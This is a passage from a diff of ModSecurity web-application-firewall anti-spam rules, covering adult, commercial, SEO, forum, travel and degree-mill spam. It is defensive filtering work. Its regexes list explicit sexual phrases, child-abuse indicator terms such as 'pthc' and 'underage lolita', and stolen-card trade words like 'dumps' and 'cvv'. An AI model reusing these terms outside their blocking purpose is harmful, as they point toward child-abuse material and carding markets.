-_.,\"\'\|]?age|teeners?|lolitas?|animal|dog|couples?|bisexuals?|bicurious|anal|ass|fisting|rimming|pussy[ -_.,\"\'\|]?(?:(?:li|fu)cking|sex)|barnyard|lesbians?|dykes?|horses?|zoo|nurses?|cheerleaders?|costume|dressup|topless|exotic[ -_.,\"\'\|]?dancer)[ -_.,\"\'\|]?(?:sex|porn|video|xxx)|sex-with|(?:cam|chat|online)sex|live[ -_.,\"\'\|](?:sex|nude|girls)|sexchat|(?:adult|free)[ -_.,\"\'\|]?porn|adult[ -_.,\"\'\|]?video|adultweb|hardcore(?:sex|porn)|(?:teen|lolitas?|xxx|core)porn|cam(?:girl|live|lolita)|(:?animal|cam|chat|dog|hardcore|live|online|voyeur)sex|(?:paris[ -_.,\"\'\|]?hilton|kardashian)[ -_.,\"\'\|]?sex[ -_.,\"\'\|]?tape|huojia|jinxinghj|sex[ -_.,\"\'\|]?(?:plugin|zone)|boy-and-girl-kiss|naughty[ -_.,\"\'\|]?high[ -_.,\"\'\|]?school|(?:horny|sexy|under[ -_.,\"\'\|]?age|amateur)[ -_.,\"\'\|]?(?:teen|porn|xxx|l(?:esbian|olita|ingerie)|bisexual|shemale)|adult[ -_.,\"\'\|]?buy[ -_.,\"\'\|]?sex|sex[ -_.,\"\'\|]?toy[ -_.,\"\'\|]?store|adult[ -_.,\"\'\|]?shopping|(?:under[ -_.,\"\'\|]?age|asian|lesbian|incest|girls?|lolitas?|shemale|(?:g|t)rann(?:y|ie))[ -_.,\"\'\|]?(?:sex|porn)|!(be)slut|sex[ -_.,\"\'\|]?(?:\bcam\b|chat|plugin|zone)|adult(?:chat|live|porn|web|friend|xxx)|porn(?:all|m|sex|zone|web|link)|(?:mail[ -_.,\"\'\|]?order|russian)[ -_.,\"\'\|]?bride|dominatrix|maledom|femdom|femsub|malesub|cuckold|(?:ass|butt)[ -_.,\"\'\|]?(?:fuck|shag)|scatology|girl[ -_.,\"\'\|]?girl|foot[ -_.,\"\'\|]?fetish|golden[ -_.,\"\'\|]?shower|submissive[ -_.,\"\'\|]?(?:male|female|husband|wife|girl|boy|dyke|lesbian|twink)|lolita (?:(?:erotica|beauty|model|young|lolita) (?:pic|nude|blue)|underage)|(?:ukraine|russian?|underaged?|asian?|great|little|forbidden|lesbian|teens?|preteens?) lolita|(?:pedo|underage|babies|content) pthc|pthc (?:megaupload|bbs|kasumi)|aqua teen porn|(?:preteen(age)?|underage|lolita) mod(?:el|le))" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300074,rev:23,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Adult',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300078:
+SecRule ARGS|!ARGS:/saml/|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:/refer/|!ARGS:/url/|!ARGS:/saml/|!ARGS:/dnssearch/|!ARGS:file|!ARGS:/token/ "[ -_.,\"\'\|](?:sister cartoons|couples? (?:seduce|fuck|bang|shag) (?:teen|young|girl|boy|little)|(?:sister|milf|gay|lesbian|lolitas?|under[ -_.,\"\'\|]?age|teen(?:er)?s?|hardcore|porn)s? (?:sex|fuck|shag)|cumming[ -_.,\"\'\|]?on[ -_.,\"\'\|]?(each[ -_.,\"\'\|]?other|(?:her|his)[ -_.,\"\'\|]?face)|(?:cheating|slut|swapp?(?:ing)?)[ -_.,\"\'\|]?wi(?:v|f)e|free[ -_.,\"\'\|]?movies?[ -_.,\"\'\|]?of|sexy[ -_.,\"\'\|]?strip[ -_.,\"\'\|]?tease|(porno?|sex|gay|lesbian|under[ -_.,\"\'\|]?age|lolita)[ -_.,\"\'\|]?(?:movie|video|picture|still|photo)s?|hardcore[ -_.,\"\'\|]?(?:porn|xxx|movies|teen|lolita)|hentai|(great|fuck|shag)[ -_.,\"\'\|]?penis(?:es)?|(?:real|cute|atk|extreme|ugly|crazy|free|local)[ -_.,\"\'\|]?hairy[ -_.,\"\'\|]?girls?|(?:little|young|underage)[ -_.,\"\'\|]?(?:girl|boy)s?[ -_.,\"\'\|]?(?:naked|sex|fuck|shag|xxx|porn)|large[ -_.,\"\'\|]?natural[ -_.,\"\'\|]?(?:tit|boob)(?:ie)?s?|naked[ -_.,\"\'\|]?(?:boys|girls)[ -_.,\"\'\|]?young|hentai[ -_.,\"\'\|]|(?:big[ -_.,\"\'\|]?tits?|\bporn\b|anal|cuckold|school(?:girl|boy))[ -_.,\"\'\|]?gall?er(?:y|ies))"   "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300078,rev:6,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Adult',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_ADULT_SPAM
+
+############ COMMERCIAL SPAM #############
+SecRule ARGS "@pm free survey cheap discount sale ipod iphone dumps cvv nkoia phone music mp3 player plasma flat screen xbox play payment station ps3 ps2 superfood fuel vaction time share named number increase guarantee advice rollx rollex diet pill vacation percent off buy rumer online leads google ranking limited itune zune wii ipad brass cable broad cigarette phone gifts spells office purchase graduation money shop hand shoulder gucci vuitton oakley"         "id:333909,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,t:none,id:333741,pass,nolog,noauditlog,skipAfter:END_COMMERCIAL_SPAM"
+
+#SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:description|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "(?:brass(?:fast|-parts-india|-nuts-screws-fasteners|-inserts|-fittings-india|-fastener-india|-copper-castings|-components-india|turnedcomponents|terminalconnectors|-screws-bolts-nuts|precisionparts|partsindia|nuts-brassbolts|neutrallinks|-inserts-fasteners-india|insertsbrassnutsbrassbolts|buildinghardware|cableglands|electrical|electricalaccessories|electricalcomponents|fastenersindia|-fasteners|-fasteners-india|fittingcomponents)|cable(glandsworldwide|-glands-asia|glands-india)|serve(?:beer|blog|counterstrike|ftp|game|halflife|mp3|pics|quake)|broad(?:-band-phone|band-phone-future\.blogspot|band-phone-info|bandphoneservices)|\.cable(?:accs|glandsindia)|\.conex(?:india|metals|techno)|diamond-(rings-india|ring-diamond-rings|pendants-india|earrings-india|jewellery-india|ring-rings\.tripod)|electrical(?:-brass-components|brass\.f2s))\.com" #        "t:none,t:lowercase,t:compressWhitespace,id:300067,rev:13,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Commercial spammer URL',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300069:
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "\b(?:free|cheap|discount|shop|for[ -_.,\"\'\|]?sale)\b[ -_.,\"\'\|](?:crocs|nokia|north ?face|canada ?goose|cell[ -_.,\"\'\|]?i?phone|(?:mp3|music|ip(?:od|hone)[ -_.,\"\'\|]?player)|ip(?:od|hone)|plasma|flat[ -_.,\"\'\|]?screen|\bxbox\b|play[ -_.,\"\'\|]?station|ps(?:4|3|2)|game[ -_.,\"\'\|]?boy|\bpsp\b|louis[ -_.,\"\'\|]?vuitton|(?:hand|shoulder)[ -_.,\"\'\|]?bag|roll?ex|diet[ -_.,\"\'\|]?pill|vacation|time[ -_.,\"\'\|]?share|free online games)"         "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300069,rev:26,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Commercial',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "(?:named[ -_.,\"\'\|]?(?:\#1|number[ -_.,\"\'\|]?(?:1|one))[ -_.,\"\'\|]?superfood|fuel[ -_.,\"\'\|]?increase[ -_.,\"\'\|]?guarante|advice[ -_.,\"\'\|]?and[ -_.,\"\'\|]?payment[ -_.,\"\'\|]?notification|(?:louis[ -_.,\"\'\|]?vuitton|factory|north ?face|canada ?goose)[ -_.,\"\'\|]?\b(?:outlet|online|stores?)\b|(?:vacation|time[ -_.,\"\'\|]?share)[ -_.,\"\'\|]?(?:discount|for[ -_.,\"\'\|]?sale|free|[0-9][0-9](?:\%|percent)[ -_.,\"\'\|]?off|cheap)|aggressive[ -_.,\"\'\|]?buying[ -_.,\"\'\|]?equipment|get a discount of up to 50% for|x-?rumer |increase your online leads|1st page google ranking|attract free shipment|yiacoumis z limited|for[ -_.,\"\'\|]?s(?:a|e)ll[ -_.,\"\'\|]?i?(?:phone|tune|pod|xbox|wii|ipad|zune)|cheap[ -_.,\"\'\|]?(?:abercrombie|\buggs?\b)|i sell dumps|interactive survey panel|surveys?[ -_.,\"\'\|]?(?:for|4)[ -_.,\"\'\|]?(?:money|cash)|electronic cigarette|reverse[ -_.,\"\'\|]c?e?l?l? ?[ -_.,\"\'\|]phone[ -_.,\"\'\|]lookup|(?:(?:basket|foot)ball|soccer)[ -_.,\"\'\|]coach[ -_.,\"\'\|]gifts|love spells.{1,100}financial help|microsoft office term 20[0-1][0-9]|can purchase a spinner bicycle|picking a good graduation gifts|quickly earn money|make money fast|(?:uggs?|coach|vitton|factory|michael kors|gucci|oakley|handbags?) outlet|oakley x squared )"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300066,rev:26,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Commercial',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_COMMERCIAL_SPAM
+############# SEO SPAM #################
+SecRule ARGS "@pm traffic mass rankings post thread forum blog cheat guest seo google bing captcha register break web site cool helpful understand nice good rock design search engine optim first rank xrunner xroomer xrumer xruumer xrummer portal website board paralleled matchless otimiza link gold"         "id:333910,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333743,t:none,pass,nolog,noauditlog,skipAfter:END_SEO_SPAM"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:utm_term|!ARGS:/ticket/|!ARGS:/banned/|!ARGS:ban_user|!ARGS:/casetrack/|!ARGS:block|!ARGS:ban|!ARGS:setting[banemail]|!ARGS:/password/  "(?:generator cheats? 202|cheats 202. working|(?:cheat|gem)s? generator|cheatmod\.org|(?:gold|diamonds?) generator no (?:jailbreak|human)|go cheats? code|lives generator and cheat)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300073,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Game cheat spam content detected',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+# Rule 300071:
+SecRule ARGS|!ARGS:/domain/|!ARGS:/filter/!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/  "(?:xr(?:unn|oom|uu?m)er |mass post threads and messages on forums, blogs, guestbooks,|this forum has captcha on registering, but it's was breaked|break (?:captchas?|anti-?bot (?:protections?)?) automa(?:t|g)icall?y |did you hear about best software for promo and seo|search[ -_.,\"\'\|]engine[ -_.,\"\'\|]optimiz|hello[ -_.,\"\'\|]?cool[ -_.,\"\'\|]?site|xciting[ -_.,\"\'\|]?website|cool[ -_.,\"\'\|]?guest[ -_.,\"\'\|]?book|really[ -_.,\"\'\|]?helpful[ -_.,\"\'\|]?for[ -_.,\"\'\|]?understand|!(very)[ -_.,\"\'\|]?(?:nice|good)[ -_.,\"\'\|]?(?:(?:web)?site|design)|this[ -_.,\"\'\|]?site[ -_.,\"\'\|]?rocks|wonderful(?: that site wonderful|(?:wonderful this|your) portal (?:incomparable|nice))|super your site nice |(?:otimização|otimização) de sites|(?:seo|search engine optimization) services?:? get free evaluation of your (?:(web)?site|blog|forum)|we (?:are interested to|can) increase (?:traffic|rankings?) (?:to|of) your website|free website analysis and ranking report for|p to ten times your targeted traffic|(?:seo|search engine optimization|link[ -_.,\"\'\|]?building) service|drive mass traffic to your site|top of the search engine)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300071,rev:14,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible SEO or spamware content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/ "(?:w(?:o(?:nderful (?:your(?:'s (?:portal (?:incomparable|unparalleled)|board unparalleled|site incomparable)| (?:portal incomparable|board unparalleled))|th(?:at (?:board (?:matchless|unmatched)|site wonderful)|is portal (?:peerless|nice))|it's portal unequalled)|w (?:th(?:is (?:b(?:oard wonderful|log peerless)|portal nonpareil)|at (?:site (?:matchless|wonderful)|board unmatched))|your(?: portal unparalleled|'s portal nice)|it's (?:portal|blog) class))|hant to say (?:your(?: b(?:oard (?:un(?:parallel|match)ed|wonderful)|log unparalleled)|'s board (?:incomparable|cool))|th(?:is (?:b(?:oard unparalle|log unequal)led|portal matchless|site cool)|at site (?:unmatched|class))|it's (?:portal matchle|site cla)ss)|a(?:nna say (?:your(?: (?:(?:blog unparallel|portal unmatch)ed|site nonpareil)|'s site cool)|th(?:is (?:board unapproachable|portal nonpareil)|at site unparalleled)|it's b(?:oard unapproach|log incompar)able)|r doesn't make boys men)|e all agree that your theory is crazy)|i (?:say (?:your(?:'s (?:site (?:unapproachable|peerless)|portal wonderful|blog unmatched)| (?:portal (?:incomparable|wonderful)|(?:board matchle|site cla)ss))|th(?:at (?:blog (?:unmatched|wonderful)|site unapproachable)|is board (?:unparalleled|nonpareil|peerless))|it's (?:site matchless|portal nice))|think (?:your(?:'s (?:portal (?:(?:matchle|cla)s|have 5 star)s|site (?:unparalleled|class))| (?:site have 5 star|blog clas)s)|this site peerless)|know (?:your(?:'s (?:portal (?:wonderful|nice)|site incomparable)| portal (?:unparalleled|wonderful))|this (?:site have 5 star|board peerles)s))|yes (?:th(?:is (?:blog (?:un(?:approachable|equalled)|matchless)|site unparalleled|portal nonpareil)|at (?:board nonpareil|site nice))|it's (?:b(?:oard (?:unapproachable|class)|log incomparable)|site incomparable|portal matchless)|your(?: (?:b(?:log wonderful|oard nice)|portal matchless|site nice)|'s portal have 5 stars))|amazing (?:your(?:'s (?:blog (?:unapproachable|nonpareil|class)|site incomparable)| b(?:oard|log) nonpareil)|th(?:is portal unapproachable|at portal unequalled)|it's (?:board unapproachable|portal peerless))|gorgeous (?:th(?:at (?:b(?:log (?:unequalled|cool)|oard incomparable)|site unequalled)|is board peerless)|your(?:'s b(?:oard nonpareil|log unmatched)| portal matchless)|it's site (?:have 5 stars|unmatched))|super (?:th(?:at (?:board incomparable|portal matchless)|is board matchless)|it's (?:blog (?:incomparable|unequalled)|portal peerless)|your (?:(?:portal|site) nice|board cool)))" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300049,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible SEO or spamware content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_SEO_SPAM
+
+############# SEO SPAM #################
+SecRule ARGS "@pm hello dear membery forum secretsline everyone name devils shows traffic princess wonderful brilliant knowing"         "id:353911,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333744,t:none,pass,nolog,noauditlog,skipAfter:END_FORUM_SPAM"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/   "(?:hello dear membery? forum|anonymous downloading movies, music and surfing on the internet|secretsline|devils icebox|high quality wire shows|methods for generating youtube traffic)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300035,rev:3,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible spam content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecRule ARGS "(?:what is up everyone\? my name is .{1,50}am new to the forum and just wanted to say hi|friend.s princess|wonderful beat \!|broadcast provided brilliant clear idea|my knowing has)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300186,rev:3,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Generic Forum Spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_FORUM_SPAM
+
+############# TRAVEL SPAM #################
+SecRule ARGS "@pm visit saopaulo paris bahamas island eleuthera"         "id:333912,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333745,t:none,pass,nolog,noauditlog,skipAfter:END_TRAVEL_SPAM"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/   "visit(?:(?:afghanistan|armenia|azerbaijan|bahrain|bangladesh|bhutan|bosnia|brunei|cambodia|china|christmasisland|centralasia|cocosislands|croatia|cyprus|egypt|india|indonesia|iran|israel|jordan|kiev|korea|kosovo|kuwait|kyrgyzstan|laos|latvia|macedonia|malaysia|maldives|mongolia|nepal|northkorea|oman|pakistan|philippines|russia|saudiarabia|southkorea|switzerland|tajikistan|turkmenistan|uae|uzbekistan)|(?:chn|capena|car|esp|solomonislands)\.com|(?:bombay|world)\.info|visit-london\.eu)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300030,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Travel spam content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/ "(?:saopaulo(?:aero|artes|autos|bares|bus|channel|cidades|cinemas|estradas|eventos|gallery|gallery|gaytravel|invest|links|mall|mapas|market|metro|moda|museus|night|noticias|parques|photo|praias|relax|restaurantes|ruas|shuttle|sites|suites|teatros|town|work)|bahamas(-beach-rental|-bookstore|-diving|-honeymoon|-rental|-store|-travel|-villa-rental|homesite)|cat-island(?:-rental\.com|\.net)|eleuthera-(?:bahamas|bahamas-rental|rental))\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300031,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Travel spam content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/ "paris(?:officedetourisme|tennessenews|roller|texasnewspaper)\.info" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300033,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Travel spam content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_TRAVEL_SPAM
+###########DEGREE MILL#############
+# Rule 300072:
+SecRule ARGS "@pm degree diploma"         "id:333913,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333746,t:none,pass,nolog,noauditlog,skipAfter:END_DIPLOMA_SPAM"
+
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/|!ARGS:/search/|!ARGS:toemail|!ARGS:fromemail "(?:degree|diploma) in radiology"          "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300072,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Degree Mill',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_DIPLOMA_SPAM
+############FAKE AV SPAM##################
+SecRule ARGS "@pm virus malware spy greeting"         "id:333914,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333747,t:none,pass,nolog,noauditlog,skipAfter:END_ANTIVIRUS_SPAM"
+
+#Rule 300080
